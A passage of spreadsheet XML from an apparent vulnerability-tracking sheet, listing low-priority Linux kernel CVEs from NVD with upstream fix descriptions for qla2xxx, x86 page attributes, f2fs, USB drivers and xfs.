      <c r="D481" s="5" t="inlineStr"/>
      <c r="E481" s="5" t="inlineStr"/>
      <c r="F481" s="5" t="inlineStr"/>
      <c r="G481" s="5" t="inlineStr"/>
      <c r="H481" s="5" t="inlineStr"/>
      <c r="I481" s="5" t="inlineStr"/>
      <c r="J481" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K481" s="5" t="inlineStr"/>
      <c r="L481" s="5" t="inlineStr"/>
      <c r="M481" s="5" t="inlineStr"/>
      <c r="N481" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O481" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P481" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q481" s="5" t="inlineStr"/>
      <c r="R481" s="5" t="inlineStr"/>
      <c r="S481" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Fix soft lockup polling continuation IOCB signature
qla27xx_copy_multiple_pkt() and qla27xx_copy_fpin_pkt() poll
rsp_q-&gt;ring_ptr-&gt;signature for RESPONSE_PROCESSED (0xDEADDEAD) to decide
whether the next continuation IOCB has arrived, spinning on cpu_relax()
without advancing the ring or decrementing the entry count while it has
not. response_t::signature lives at byte offset 60, but a continuation
IOCB (sts_cont_entry_t / struct sts_cont_entry_ext) carries raw FC frame
payload at that offset (data[56..59]). A received frame whose payload
bytes happen to equal 0xDEADDEAD is therefore misread as "not yet
arrived", and the loop spins forever in interrupt/DPC context, causing a
CPU soft lockup.
The poll is also unnecessary: callers of qla27xx_copy_multiple_pkt()
(PT_LS4_UNSOL and the NVMe purls path) already gate on
qla_chk_cont_iocb_avail(), which guarantees all entry_count IOCBs are
present before copying begins. The sibling helper
__qla_copy_purex_to_buffer() already drops the signature poll and relies
on the entry_type == STATUS_CONT_TYPE guard instead.
Remove the signature busy-wait from both helpers, keeping the entry_type
guard, and gate the FPIN path with qla_chk_cont_iocb_avail() so it defers
and re-processes on the next interrupt once all continuation IOCBs have
arrived, mirroring the ELS_AUTH_ELS and PT_LS4_UNSOL arms. With this the
signature field is never read on a continuation IOCB, eliminating the
payload-aliasing lockup.</t>
        </is>
      </c>
      <c r="T481" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97530</t>
        </is>
      </c>
    </row>
    <row r="482">
      <c r="A482" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B482" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C482" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97532</t>
        </is>
      </c>
      <c r="D482" s="5" t="inlineStr"/>
      <c r="E482" s="5" t="inlineStr"/>
      <c r="F482" s="5" t="inlineStr"/>
      <c r="G482" s="5" t="inlineStr"/>
      <c r="H482" s="5" t="inlineStr"/>
      <c r="I482" s="5" t="inlineStr"/>
      <c r="J482" s="5" t="inlineStr"/>
      <c r="K482" s="5" t="inlineStr"/>
      <c r="L482" s="5" t="inlineStr"/>
      <c r="M482" s="5" t="inlineStr"/>
      <c r="N482" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O482" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P482" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q482" s="5" t="inlineStr"/>
      <c r="R482" s="5" t="inlineStr"/>
      <c r="S482" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Null out freed pointers in qla2x00_mem_alloc() error path
When qla2x00_mem_alloc() fails, qla2x00_probe_one() jumps to
probe_hw_failed and calls qla2x00_mem_free(). Several error labels in
qla2x00_mem_alloc() freed adapter members (elsrej.c, purex_dma_pool,
flt, sfp_data, loop_id_map, async_pd, sf_init_cb, ex_init_cb, npiv_info)
but left the pointers dangling. qla2x00_mem_free() then freed them a
second time. Worse, for the dma_pool members it issued
dma_pool_free(ha-&gt;s_dma_pool, ...) after s_dma_pool had already been
destroyed and set to NULL at fail_s_dma_pool, dereferencing a NULL pool.
Clear each freed pointer (and its DMA handle) in the error labels so the
subsequent qla2x00_mem_free() skips them.</t>
        </is>
      </c>
      <c r="T482" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97532</t>
        </is>
      </c>
    </row>
    <row r="483">
      <c r="A483" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B483" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C483" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97533</t>
        </is>
      </c>
      <c r="D483" s="5" t="inlineStr"/>
      <c r="E483" s="5" t="inlineStr"/>
      <c r="F483" s="5" t="inlineStr"/>
      <c r="G483" s="5" t="inlineStr"/>
      <c r="H483" s="5" t="inlineStr"/>
      <c r="I483" s="5" t="inlineStr"/>
      <c r="J483" s="5" t="inlineStr"/>
      <c r="K483" s="5" t="inlineStr"/>
      <c r="L483" s="5" t="inlineStr"/>
      <c r="M483" s="5" t="inlineStr"/>
      <c r="N483" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O483" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P483" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q483" s="5" t="inlineStr"/>
      <c r="R483" s="5" t="inlineStr"/>
      <c r="S483" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/mm/pat: Acquire init_mm read lock on attribute changes to avoid UAF
A previous commit protected against races between ptdump and CPA collapse,
however one still exists between attribute changes and collapse as reported
by Denis V. Lunev (linked).
When an attribute change arises, a lockless page table walker obtains a PTE
entry, which is later written to via set_pte_atomic():
  ...
  -&gt; change_page_attr_set_clr()
  -&gt; __change_page_attr_set_clr()
  -&gt; __change_page_attr()
	-&gt; _lookup_address_cpa()
	-&gt; lookup_address_in_pgd_attr()
	-&gt; [ lockless page table walker ]
  -&gt; set_pte_atomic()
There is nothing preventing a concurrent CPA collapse which can free the
PTE that was retrieved here, resulting in a use-after-free.
With the mmap write lock taken on init_mm over CPA collapse, resolve this
race by acquiring an mmap read lock on init_mm over
__change_page_attr_set_clr().
This locks across the whole operation over which the walk and the PTE
entry write occurs, solving the race.
It is safe to do this here, as no spinlocks are held upon entry to
__change_page_attr_set_clr().
However, the lock must not be held over an allocation, as allocation can
trigger reclaim and shrinkers may call into CPA recursively, making
deadlocks possible (init_mm -&gt; ... -&gt; fs_reclaim -&gt; init_mm).
A page table is allocated when a huge page needs to be split:
  -&gt; change_page_attr_set_clr()
  -&gt; __change_page_attr_set_clr()
  -&gt; __change_page_attr()
  -&gt; split_large_page()
  [ pagetable_alloc() ]
  -&gt; __split_large_page()
Avoid deadlocks by dropping the mmap lock across pagetable_alloc() in
split_large_page() and track whether this is needed by adding a new
'init_mm_read_locked' flag to struct cpa_data.
This is safe as __split_large_page() (called with locks re-established)
revalidates that the page table entry is the same as it was prior to the
locks being dropped and __change_page_attr() repeats the entire page table
walk whenever a split occurs, so concurrent split and collapse are
accounted for.
Concurrent ptdump is also safe as the lock is only dropped over page table
allocation during which time the page table has not yet been modified.
The CPA_COLLAPSE flag is only set by set_memory_rox(), which exclusively
operates upon vmalloc ranges, and on x86 only within the module mapping
space.
This is important, because some callers directly invoke
__change_page_attr_set_clr(), bypassing this lock. However, none of these
operate within the module mapping space.
  * cpa_process_alias() - a recursive helper called by
    __change_page_attr_set_clr().
  * __set_memory_enc_pgtable() - operates on the direct mapping and (via
    __vmbus_establish_gpadl()) the vmalloc mapping space.
  * __set_pages_[n]p() - called by set_direct_map_[invalid, default,
    valid]_noflush(), __kernel_map_pages() - operates on the direct map.
  * kernel_[un]map_pages_in_pgd() - operates on EFI ranges.
This work is based upon Denis V. Lunev's excellent analysis of the bug
with gratitude.
[ dhansen: move to imperative voice in changelog ]</t>
        </is>
      </c>
      <c r="T483" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97533</t>
        </is>
      </c>
    </row>
    <row r="484">
      <c r="A484" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B484" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C484" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97534</t>
        </is>
      </c>
      <c r="D484" s="5" t="inlineStr"/>
      <c r="E484" s="5" t="inlineStr"/>
      <c r="F484" s="5" t="inlineStr"/>
      <c r="G484" s="5" t="inlineStr"/>
      <c r="H484" s="5" t="inlineStr"/>
      <c r="I484" s="5" t="inlineStr"/>
      <c r="J484" s="5" t="inlineStr">
        <is>
          <t>tempo</t>
        </is>
      </c>
      <c r="K484" s="5" t="inlineStr"/>
      <c r="L484" s="5" t="inlineStr"/>
      <c r="M484" s="5" t="inlineStr"/>
      <c r="N484" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O484" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P484" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q484" s="5" t="inlineStr"/>
      <c r="R484" s="5" t="inlineStr"/>
      <c r="S484" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: accurately adjust free_sections during free_segment_range
In free_segment_range(), MAIN_SECS(sbi) is temporarily reduced by `secs`
to restrict block allocation to the safe remaining main area while valid
blocks in the truncated range are evacuated by GC.
However, FREE_I(sbi)-&gt;free_sections tracks the total number of free
sections across the whole filesystem. If any sections within the
truncated range were already free upon entering free_segment_range(),
failing to deduct them from free_sections causes the filesystem to
overestimate available free sections in the active, reduced main area.
This leads to inconsistent free section accounting during GC data
migration and can trigger unexpected allocation failures or assertion
errors when space is tight.
Fix this by calculating the number of already-free sections in the
truncated range, deducting them from free_sections upon entering
free_segment_range(), and restoring them on exit.</t>
        </is>
      </c>
      <c r="T484" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97534</t>
        </is>
      </c>
    </row>
    <row r="485">
      <c r="A485" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B485" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C485" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97535</t>
        </is>
      </c>
      <c r="D485" s="5" t="inlineStr"/>
      <c r="E485" s="5" t="inlineStr"/>
      <c r="F485" s="5" t="inlineStr"/>
      <c r="G485" s="5" t="inlineStr"/>
      <c r="H485" s="5" t="inlineStr"/>
      <c r="I485" s="5" t="inlineStr"/>
      <c r="J485" s="5" t="inlineStr"/>
      <c r="K485" s="5" t="inlineStr"/>
      <c r="L485" s="5" t="inlineStr"/>
      <c r="M485" s="5" t="inlineStr"/>
      <c r="N485" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O485" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P485" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q485" s="5" t="inlineStr"/>
      <c r="R485" s="5" t="inlineStr"/>
      <c r="S485" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Bound VP index against VP_CTRL IOCB bitmap size
The VP control IOCB selects its target virtual port by setting one bit
in vp_idx_map, a fixed 16-byte (128-bit) array in both
vp_ctrl_entry_24xx and vp_ctrl_entry_24xx_ext. qla25xx_ctrlvp_iocb()
computes map = (vp_index - 1) / 8 and writes vce-&gt;vp_idx_map[map]
without checking that map stays within the array.
max_npiv_vports is taken from firmware and only sanitized to a
MIN_MULTI_ID_FABRIC-aligned boundary, so it can legitimately be 191 or
255, and qla24xx_control_vp() only rejects vp_index &gt;= max_npiv_vports.
A vp_index above 128 therefore yields map &gt;= 16 and an out-of-bounds
write of up to 16 bytes past vp_idx_map, corrupting the trailing IOCB
fields (or the adjacent request-ring slot on the 64-byte layout).
Reject a vp_index that cannot be represented in the IOCB bitmap in
qla24xx_control_vp(), and add a defensive ARRAY_SIZE() guard in
qla25xx_ctrlvp_iocb() before the write. Adapters that report the usual
63 or 127 NPIV vports are unaffected.</t>
        </is>
      </c>
      <c r="T485" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97535</t>
        </is>
      </c>
    </row>
    <row r="486">
      <c r="A486" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B486" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C486" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97537</t>
        </is>
      </c>
      <c r="D486" s="5" t="inlineStr"/>
      <c r="E486" s="5" t="inlineStr"/>
      <c r="F486" s="5" t="inlineStr"/>
      <c r="G486" s="5" t="inlineStr"/>
      <c r="H486" s="5" t="inlineStr"/>
      <c r="I486" s="5" t="inlineStr"/>
      <c r="J486" s="5" t="inlineStr"/>
      <c r="K486" s="5" t="inlineStr"/>
      <c r="L486" s="5" t="inlineStr"/>
      <c r="M486" s="5" t="inlineStr"/>
      <c r="N486" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O486" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P486" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q486" s="5" t="inlineStr"/>
      <c r="R486" s="5" t="inlineStr"/>
      <c r="S486" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
scsi: qla2xxx: Fix queue teardown NULL dma_free and bitmap locking
qla25xx_free_req_que() and qla25xx_free_rsp_que() have two pre-existing
bugs exposed on the error path of qla25xx_create_{req,rsp}_que():
 1. When dma_alloc_coherent() fails during queue creation, the error
    path calls the free function with req-&gt;ring / rsp-&gt;ring still NULL
    (from kzalloc).  The unconditional dma_free_coherent() with a NULL
    cpu_addr is undefined behavior and can panic.
 2. The free functions clear req_qid_map / rsp_qid_map under vport_lock,
    but the create functions protect the same bitmaps with mq_lock.
    This provides no mutual exclusion.  Additionally, the create error
    path clears the bit and releases mq_lock before calling the free
    function, creating a window where another thread can allocate the
    same que_id and have its ha-&gt;req_q_map entry clobbered by the
    subsequent lockless NULL assignment in the free function.
Fix by:
 - Guarding dma_free_coherent() with a NULL check on the ring pointer.
 - Using mq_lock (the lock held by all creators) in the free functions
   to atomically NULL the map entry and clear the bitmap bit.
 - Removing the now-redundant clear_bit blocks from the create error
   paths since the free functions handle it atomically.</t>
        </is>
      </c>
      <c r="T486" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97537</t>
        </is>
      </c>
    </row>
    <row r="487">
      <c r="A487" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B487" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C487" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97538</t>
        </is>
      </c>
      <c r="D487" s="5" t="inlineStr"/>
      <c r="E487" s="5" t="inlineStr"/>
      <c r="F487" s="5" t="inlineStr"/>
      <c r="G487" s="5" t="inlineStr"/>
      <c r="H487" s="5" t="inlineStr"/>
      <c r="I487" s="5" t="inlineStr"/>
      <c r="J487" s="5" t="inlineStr"/>
      <c r="K487" s="5" t="inlineStr"/>
      <c r="L487" s="5" t="inlineStr"/>
      <c r="M487" s="5" t="inlineStr"/>
      <c r="N487" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O487" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P487" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q487" s="5" t="inlineStr"/>
      <c r="R487" s="5" t="inlineStr"/>
      <c r="S487" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwmon: (asus_rog_ryujin) Validate HID report lengths
rog_ryujin_raw_event() parses response headers and payload fields without
first checking that they are present in the received report. A short report
can therefore make the driver consume uninitialized bytes from the HID
transport buffer and expose them as sensor values through sysfs.
Validate the response header and the fields used by each response type
before parsing them.</t>
        </is>
      </c>
      <c r="T487" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97538</t>
        </is>
      </c>
    </row>
    <row r="488">
      <c r="A488" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B488" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C488" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97539</t>
        </is>
      </c>
      <c r="D488" s="5" t="inlineStr"/>
      <c r="E488" s="5" t="inlineStr"/>
      <c r="F488" s="5" t="inlineStr"/>
      <c r="G488" s="5" t="inlineStr"/>
      <c r="H488" s="5" t="inlineStr"/>
      <c r="I488" s="5" t="inlineStr"/>
      <c r="J488" s="5" t="inlineStr"/>
      <c r="K488" s="5" t="inlineStr"/>
      <c r="L488" s="5" t="inlineStr"/>
      <c r="M488" s="5" t="inlineStr"/>
      <c r="N488" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O488" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P488" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q488" s="5" t="inlineStr"/>
      <c r="R488" s="5" t="inlineStr"/>
      <c r="S488" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
usb: xusbatm: don't rely on id table pointer arithmetic
The current code is broken when dynamic ID is involved; in such cases
usb_device_id parameter of probe lives on the heap and the pointer
arithmetic will get an index that is wildly out of bound. xusbatm
initialize the USB device IDs dynamically so it can just use driver_info
too.
Even with conversion, xusbatm still cannot support dynamic IDs, so also set
no_dynamic_id.</t>
        </is>
      </c>
      <c r="T488" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97539</t>
        </is>
      </c>
    </row>
    <row r="489">
      <c r="A489" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B489" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C489" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97540</t>
        </is>
      </c>
      <c r="D489" s="5" t="inlineStr"/>
      <c r="E489" s="5" t="inlineStr"/>
      <c r="F489" s="5" t="inlineStr"/>
      <c r="G489" s="5" t="inlineStr"/>
      <c r="H489" s="5" t="inlineStr"/>
      <c r="I489" s="5" t="inlineStr"/>
      <c r="J489" s="5" t="inlineStr"/>
      <c r="K489" s="5" t="inlineStr"/>
      <c r="L489" s="5" t="inlineStr"/>
      <c r="M489" s="5" t="inlineStr"/>
      <c r="N489" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O489" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P489" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q489" s="5" t="inlineStr"/>
      <c r="R489" s="5" t="inlineStr"/>
      <c r="S489" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: usb: pegasus: don't rely on id table pointer arithmetic
The current code is broken when dynamic ID is involved; in such cases
usb_device_id parameter of probe lives on the heap and the pointer
arithmetic will get an index that is wildly out of bound. Instead of
keeping a side table for additional information, use driver_info field of
the usb_device_id.
The dynamic ID parsing code needs to be updated for this; convert it to
just write to the reserved entry for dynamic ID and remove the weird loop.</t>
        </is>
      </c>
      <c r="T489" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97540</t>
        </is>
      </c>
    </row>
    <row r="490">
      <c r="A490" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B490" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C490" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97541</t>
        </is>
      </c>
      <c r="D490" s="5" t="inlineStr"/>
      <c r="E490" s="5" t="inlineStr"/>
      <c r="F490" s="5" t="inlineStr"/>
      <c r="G490" s="5" t="inlineStr"/>
      <c r="H490" s="5" t="inlineStr"/>
      <c r="I490" s="5" t="inlineStr"/>
      <c r="J490" s="5" t="inlineStr"/>
      <c r="K490" s="5" t="inlineStr"/>
      <c r="L490" s="5" t="inlineStr"/>
      <c r="M490" s="5" t="inlineStr"/>
      <c r="N490" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O490" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P490" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q490" s="5" t="inlineStr"/>
      <c r="R490" s="5" t="inlineStr"/>
      <c r="S490" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: ath9k_htc: don't store usb_device_id
usb_device_id is not guaranteed to live longer than probe due to presence
of dynamic ID. All information apart from driver_data can be easily
retrieved from usb_device, so just store driver_data.</t>
        </is>
      </c>
      <c r="T490" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97541</t>
        </is>
      </c>
    </row>
    <row r="491">
      <c r="A491" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B491" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C491" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97542</t>
        </is>
      </c>
      <c r="D491" s="5" t="inlineStr"/>
      <c r="E491" s="5" t="inlineStr"/>
      <c r="F491" s="5" t="inlineStr"/>
      <c r="G491" s="5" t="inlineStr"/>
      <c r="H491" s="5" t="inlineStr"/>
      <c r="I491" s="5" t="inlineStr"/>
      <c r="J491" s="5" t="inlineStr"/>
      <c r="K491" s="5" t="inlineStr"/>
      <c r="L491" s="5" t="inlineStr"/>
      <c r="M491" s="5" t="inlineStr"/>
      <c r="N491" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O491" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P491" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q491" s="5" t="inlineStr"/>
      <c r="R491" s="5" t="inlineStr"/>
      <c r="S491" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: bail out on bitmap errors in xrep_agfl_fill
LOLLM also points out that the xagb_bitmap_set call in xrep_agfl_fill
can fail, but we don't check the result of xagb_bitmap_walk, so we
silently drop the error and proceed with inconsistent incore data.
That shouldn't be allowed.</t>
        </is>
      </c>
      <c r="T491" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97542</t>
        </is>
      </c>
    </row>
    <row r="492">
      <c r="A492" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B492" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C492" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97543</t>
        </is>
      </c>
      <c r="D492" s="5" t="inlineStr"/>
      <c r="E492" s="5" t="inlineStr"/>
      <c r="F492" s="5" t="inlineStr"/>
      <c r="G492" s="5" t="inlineStr"/>
      <c r="H492" s="5" t="inlineStr"/>
      <c r="I492" s="5" t="inlineStr"/>
      <c r="J492" s="5" t="inlineStr"/>
      <c r="K492" s="5" t="inlineStr"/>
      <c r="L492" s="5" t="inlineStr"/>
      <c r="M492" s="5" t="inlineStr"/>
      <c r="N492" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O492" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P492" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q492" s="5" t="inlineStr"/>
      <c r="R492" s="5" t="inlineStr"/>
      <c r="S492" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: destroy seen inode bitmap when we fail to add a dirpath
LOLLM observes a memory leak in xchk_dirtree_create_path if we create
the directory path object but appending the name to the path fails.
When this happens, we don't tear down the (empty) seen inode bitmap.
This is a pretty trivial error, but let's not leave logic bombs.
Do the same for a similar bug in xrep_dirtree_create_adoption_path.</t>
        </is>
      </c>
      <c r="T492" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97543</t>
        </is>
      </c>
    </row>
    <row r="493">
      <c r="A493" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B493" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C493" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97544</t>
        </is>
      </c>
      <c r="D493" s="5" t="inlineStr"/>
      <c r="E493" s="5" t="inlineStr"/>
      <c r="F493" s="5" t="inlineStr"/>
      <c r="G493" s="5" t="inlineStr"/>
      <c r="H493" s="5" t="inlineStr"/>
      <c r="I493" s="5" t="inlineStr"/>
      <c r="J493" s="5" t="inlineStr"/>
      <c r="K493" s="5" t="inlineStr"/>
      <c r="L493" s="5" t="inlineStr"/>
      <c r="M493" s="5" t="inlineStr"/>
      <c r="N493" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O493" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P493" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q493" s="5" t="inlineStr"/>
      <c r="R493" s="5" t="inlineStr"/>
      <c r="S493" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: don't leak dqacct if rhashtable insertion fails
LOLLM observes that xqcheck_mod_live_ino_dqtrx doesn't free the newly
allocated dqa object if rhashtable insertion fails.  Fix this leak.</t>
        </is>
      </c>
      <c r="T493" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97544</t>
        </is>
      </c>
    </row>
    <row r="494">
      <c r="A494" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B494" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C494" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97545</t>
        </is>
      </c>
      <c r="D494" s="5" t="inlineStr"/>
      <c r="E494" s="5" t="inlineStr"/>
      <c r="F494" s="5" t="inlineStr"/>
      <c r="G494" s="5" t="inlineStr"/>
      <c r="H494" s="5" t="inlineStr"/>
      <c r="I494" s="5" t="inlineStr"/>
      <c r="J494" s="5" t="inlineStr"/>
      <c r="K494" s="5" t="inlineStr"/>
      <c r="L494" s="5" t="inlineStr"/>
      <c r="M494" s="5" t="inlineStr"/>
      <c r="N494" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O494" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P494" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q494" s="5" t="inlineStr"/>
      <c r="R494" s="5" t="inlineStr"/>
      <c r="S494" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
xfs: don't leak new_bp if xfs_btree_bload_drop_buf fails
LOLLM observes that in xfs_btree_bload_prep_block,
xfs_btree_bload_drop_buf can hit an IO error if writing the delwri
buffer list to disk fails.  In this case, we fail to release new_bp,
which means we lose a locked buffer.  Fix that.</t>
        </is>
      </c>
      <c r="T494" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97545</t>
        </is>
      </c>
    </row>
    <row r="495">
      <c r="A495" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B495" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C495" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97546</t>
        </is>
      </c>
      <c r="D495" s="5" t="inlineStr"/>
      <c r="E495" s="5" t="inlineStr"/>
      <c r="F495" s="5" t="inlineStr"/>
      <c r="G495" s="5" t="inlineStr"/>
      <c r="H495" s="5" t="inlineStr"/>
      <c r="I495" s="5" t="inlineStr"/>
      <c r="J495" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
